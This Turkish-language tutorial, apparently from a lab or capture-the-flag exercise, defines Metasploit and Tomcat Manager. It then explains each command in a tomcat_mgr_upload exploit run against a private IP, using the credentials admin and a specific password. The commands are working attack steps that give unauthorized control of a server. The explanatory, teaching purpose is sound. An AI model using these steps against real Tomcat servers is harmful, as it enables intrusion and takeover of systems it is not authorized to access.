Metasploit Framework: Güvenlik açıklarını test etmek ve bu açıkları kullanarak sistemlere erişim sağlamak için kullanılan popüler bir araçtır. Metasploit, çeşitli modüller ve araçlar içerir, bunlar arasında exploitler, payload'lar, scanner'lar ve daha fazlası bulunmaktadır.
Exploit: Bilgisayar sistemlerindeki güvenlik açıklarından yararlanarak yetkisiz erişim sağlamayı hedefleyen kod parçacıklarıdır. Exploit'ler, belirli bir sistem veya uygulama üzerinde çalışmak üzere tasarlanmıştır.
Tomcat: Apache Tomcat, Java Servlet ve JavaServer Pages (JSP) teknolojilerini destekleyen açık kaynaklı bir web sunucusudur. Tomcat, web uygulamaları için sıkça kullanılan bir platformdur.
Tomcat Manager: Tomcat sunucusunun yönetimi için kullanılan bir web arayüzüdür. Bu arayüz, uygulamaları dağıtmak, güncellemek ve yönetmek için kullanılır. Ancak, eğer bu arayüz yeterince korunmazsa, potansiyel bir güvenlik açığı oluşturabilir.
Metasploit komutlarının ne anlama geldiğine bakalım:
use exploit/multi/http/tomcat_mgr_upload:
Bu komut, Tomcat Manager uygulamasındaki yükleme açığından yararlanan bir exploit kullanmanızı sağlar. Yükleme açığı, saldırganların zararlı dosyalar yükleyerek sunucunun kontrolünü ele geçirmelerine olanak tanır.
set rhosts 192.168.1.186:
Bu komut, hedef sistemin IP adresini belirtir. Burada, exploit'in kullanılacağı hedef sistemin IP adresi olarak 192.168.1.186 belirtilmiştir.
set rport 8080:
Bu komut, hedef sistemdeki servis için kullanılan port numarasını belirtir. Tomcat genellikle 8080 numaralı portu kullanır, bu yüzden buraya 8080 değeri atanmıştır.
set httpusername admin:
Bu komut, Tomcat Manager arayüzüne erişim sağlamak için kullanılacak kullanıcı adını belirtir. Burada admin kullanıcısı belirtilmiştir.
set httppassword melehifokivai:
Bu komut, Tomcat Manager arayüzüne erişim sağlamak için kullanılacak şifreyi belirtir. Burada melehifokivai şifresi kullanılmıştır.
exploit:
Bu komut, belirtilen exploit'i hedef sisteme karşı çalıştırır. Exploit başarılı olursa, sistem üzerinde yetkisiz erişim sağlanabilir.